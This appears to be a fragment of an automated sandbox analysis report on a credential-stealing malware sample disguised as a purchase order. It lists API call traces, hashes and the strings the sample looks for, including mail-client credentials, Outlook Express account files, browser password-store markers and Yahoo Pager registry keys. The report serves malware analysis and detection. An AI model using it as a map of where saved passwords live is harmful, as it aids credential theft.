                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,75B4EB20,?), ref: 004081B9
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                      • API String ID: 524865279-2190619648
                                                                                                      • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                      • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                      • String ID: 0$6
                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                      • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                      • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                      • String ID: %2.2X
                                                                                                      • API String ID: 125969286-791839006
                                                                                                      • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                      • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                      • String ID: ACD
                                                                                                      • API String ID: 1886237854-620537770
                                                                                                      • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                      • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                      • String ID: caption$dialog_%d
                                                                                                      • API String ID: 2923679083-4161923789
                                                                                                      • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                      • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                      APIs
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                      • memset.MSVCRT ref: 00410246
                                                                                                      • memset.MSVCRT ref: 00410258
                                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                      • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 3974772901-0
                                                                                                      • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                      • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 577244452-0
                                                                                                      • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                      • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                      • String ID: imap$pop3$smtp
                                                                                                      • API String ID: 2025310588-821077329
                                                                                                      • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                      • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76230A60), ref: 00408EBE
                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408E31
                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                      • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                      • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                      APIs
                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2014771361-0
                                                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID: global-salt$password-check
                                                                                                      • API String ID: 231171946-3927197501
                                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                      • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040644F
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 438689982-0
                                                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                      • String ID: Personalities
                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                      • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                      • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00444573
                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValuememset
                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                      • API String ID: 1830152886-1703613266
                                                                                                      • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
